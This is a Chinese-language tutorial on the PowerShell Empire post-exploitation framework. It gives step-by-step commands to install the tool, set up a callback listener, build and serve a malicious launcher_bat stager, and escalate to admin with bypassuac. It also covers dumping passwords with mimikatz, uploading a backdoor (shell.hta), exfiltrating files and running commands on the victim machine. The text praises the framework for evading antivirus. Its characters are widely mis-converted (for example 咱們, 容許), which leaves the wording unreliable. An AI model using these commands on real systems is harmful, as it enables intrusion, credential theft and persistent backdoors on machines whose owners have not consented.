Empire – PowerShell 後滲透攻擊框架

0x01 簡介

Empire是一個後滲透攻擊框架。它是一個純粹的PowerShell代理，具備加密安全通訊和靈活架構的附加功能。Empire具備在不須要PowerShell.exe的狀況下執行PowerShell代理的方法。它能夠迅速採用可後期利用的模塊，涵蓋範圍普遍，從鍵盤記錄器到mimikatz等。這個框架是PowerShell Empire和Python Empire項目的組合; 這使得它用戶友好和方便。PowerShell Empire於2015年問世，Python Empire於2016年問世。它相似於Metasploit和Meterpreter。但因爲它是命令和控制工具，它容許您更有效地控制PC。

 

PowerShell提供了豐富的攻擊性優點，進一步包括.NET的所有訪問，applock白名單以及對Win32的直接訪問。它還在內存中構建惡意二進制文件。它提供C2功能，容許您在第一階段以後植入第二階段。它也能夠用於橫向移動。它與其餘框架相比發展迅速，且很是方便。此外，因爲它不須要PowerShell.exe，它可讓您繞過反病毒。所以，最好使用PowerShell Empire。

 

0x02 功能

listenter：監聽器是一個從咱們正在攻擊的機器上偵聽鏈接的進程。這有助於Empire將戰利品發回攻擊者的計算機。

Stager： stager是一段代碼，容許咱們的惡意代碼經過受感染主機上的代理運行。

proxy：代理是一種程序，用於維護計算機與受感染主機之間的鏈接。

module：執行咱們的惡意命令，這些命令能夠收集憑據並升級咱們的權限。

 

0x03 安裝

使用如下命令下載它：

git clone https://github.com/EmpireProject/Empire.git

下載完成並完成後，請按照下面給出的步驟進行安裝：

cd Empire/

cd setup/

./install.sh

安裝完成後，移回Empire目錄並使用./empire運行empire

 

如今使用help命令，由於它打開了最初所需的全部基本選項。

(Empire) > help

 

Commands

========

agents Jump to the Agents menu. # 跳轉到代理菜單

creds Add/display credentials to/from the database. # 從數據庫中添加/顯示憑據

exit Exit Empire

help Displays the help menu.

interact Interact with a particular agent. # 與特定的代理交互

list Lists active agents or listeners. # 列出活動代理或偵聽器

listeners Interact with active listeners. # 與活躍的會話互動

load Loads Empire modules from a non-standard folder. # 從非標準文件夾加載Empire模塊

plugin Load a plugin file to extend Empire. # 加載插件文件以擴展Empire

plugins List all available and active plugins. # 列出全部可用的和活動的插件

preobfuscate Preobfuscate PowerShell module_source files # 預混淆PowerShell模塊源文件

reload Reload one (or all) Empire modules. # 從新加載一個或多個Empire模塊

report Produce report CSV and log files: sessions.csv, credentials.csv, master.log

# 生成CSV報告和日誌文件

reset Reset a global option (e.g. IP whitelists). # 重置一個全局的選項

resource Read and execute a list of Empire commands from a file. # 從文件中讀取並執行Empire命令列表

searchmodule Search Empire module names/descriptions. # 搜索帝國模塊名稱/描述

set Set a global option (e.g. IP whitelists). # 設置全局選項

show Show a global option (e.g. IP whitelists). # 顯示全局選項

usemodule Use an Empire module. # 使用一個Empire模塊

usestager Use an Empire stager. # 使用一個Empire代碼段

 

根據工做流程，首先，咱們必須在本地機器上建立一個監聽器。

listeners 查看活動的偵聽器

 

進入監聽器界面輸入如下命令查看全部可用的偵聽器

(Empire: listeners) > uselistener <tab> <tab>

dbx http_com http_hop meterpreter redirector

http http_foreign http_mapi onedrive

 

最流行和最經常使用的偵聽器是http

uselistener http

此命令在本地端口80上建立一個偵聽器。若是端口80已經被像Apache這樣的服務佔用，請確保中止該服務，由於此偵聽器是http偵聽器只能在端口80上工做。

 

查看偵聽器下可使用的命令

(Empire: listeners) > <tab><tab>

agents delete enable info list resource

back disable exit kill listeners uselistener

creds edit help launcher main usestager

 

若是要刪除一個活躍的listener，使用kill命令

(Empire: listeners) > kill http

[!] Killing listener 'http'

 

如今要查看全部你應該在這個監聽器類型中提供的選項：

info

 

正如上圖所示，你可使用各類設置來修改或自定義偵聽器。咱們能夠嘗試更改咱們的監聽器的名稱，這樣有助於記住全部被激活的監聽器;

set Name test

上面的命令會將偵聽器的名稱從http更改成test。

一般，此偵聽器會自動佔用本地主機IP，但爲了以防萬一，你可使用如下命令設置IP：

set Host 192.168.88.152

execute

上面的命令將執行監聽器。而後返回並使用PowerShell偵聽器

如今輸入'back'以從監聽器接口返回，以便咱們能夠執行咱們的模塊。使用如下命令查看Empire提供的全部模塊：

(Empire: listeners/http) > back

(Empire: listeners) > usestager <tab> <tab>

正如圖中所示，Windows和IOS都有不少模塊，還有一些能夠在任何平臺上使用的多模塊。如下實驗，咱們將使用launcher_bat建立惡意軟件並利用受害者的PC。

usestager windows/launcher_bat

 

而後再次鍵入「info」以查看漏洞利用所需的全部設置。通過檢查，發現咱們只須要提供listener。

set Listener test

execute

在設置偵聽器測試並建立/tmp/launcher.bat以後，上述兩個命令將執行咱們的漏洞利用。使用python服務器在受害者的PC中執行此文件。

python -m SimpleHTTPServer 8080

 

當文件將執行時，您將有一個會話。要檢查您的會話類型：

agents

使用上面的命令，您能夠看到已激活會話。您能夠更改會話的名稱，由於默認狀況下給出的名稱很是複雜且難以記住。爲此，請鍵入：

rename P4BNYW6D pc01

使用如下命令訪問會話：

interact pc01

得到對會話的訪問權限後，請嘗試使用如下命令獲取管理會話：

bypassuac http

執行bypassuac命令後，將打開另外一個會話。鍵入如下內容重命名該會話：

rename HE3K45LN admin01

interact with admin01 now.

interact admin01

<tab> <tab>幫助咱們查看shell中的全部選項。有幾種選擇對後期開發頗有幫助。如信息，工做，列表等，如圖所示。

信息： 全部基本細節，如IP，隨機數，抖動，完整性等。

如今，若是使用'help'命令，您將可以看到全部可執行命令。

讓咱們嘗試運行 mimikatz 來獲取用戶的密碼。因爲 mimikatz 不能在普通的guest用戶shell上運行，而且只能在admin shell上運行; 這也證實咱們必須實現管理員訪問權限，以便咱們可使用mimikatz。

Hmmmm！用戶的密碼爲「123456」。

creds

上面的命令也會在明文及其哈希中轉儲任何用戶的憑據或密碼。

另外一個重要的命令是 shell 命令。

要使用受害者的shell運行正確的Microsoft Windows命令，咱們使用此功能。

例如：一個這樣的窗口的cmd only命令是 netstat

shell netstat -ano

正如預期的那樣，上面的命令向咱們展現了機器上當前工做的全部端口！

如今，由於windows中的默認shell目錄是「 C：/ windows / system32 」; 讓咱們嘗試移動到另外一個目錄並嘗試從那裏下載一些文件，咱們也能夠在該位置上傳一些內容，例如，咱們能夠上傳後門！如今，使用如下命令：

shell cd C:\Users\lihui03\Desktop

shell dir

download msf.pdf

 

上面的命令將從窗口的桌面下載一個名爲msf.pdf的圖像到「帝國的下載目錄」

在這裏咱們能夠上傳任何後門，在上面的命令的幫助下，咱們從Kali的桌面上傳一個後門到受害者的桌面，咱們甚至能夠調用這個文件，由於咱們有shell訪問權限！

upload /root/shell.hta

這是下載文件的位置：

查看上傳的文件

上面的命令證實咱們確實已經上傳了shell.hta

以前展現的是基本演示及其使用的不一樣術語以及如何使用它們。還有另外一個術語，即usemodule。最後，讓咱們看看如何使用它。

該命令將顯示全部可用模塊並可供使用，以下圖所示：

如下是如何使用usemodule的小型演示。類型：

usemodule trollsploit/message

set MsgText you have been hacked

execute

y

使用上述模塊將在受害者的PC上顯示一條消息，以下圖所示：

目標機器上是這樣的！！！

結論

惡意軟件以.exe / dll / hta等形式容許攻擊者構建任何理想的攻擊，由於此框架能夠訪問Win32。雖然反病毒公司日益知曉，但這些公司仍然有效。因爲其普遍，真實和有效的後漏洞收集，它是一個偉大的工具。最終，目標是在攻擊中未被發現併成功，這個工具容許咱們這樣作。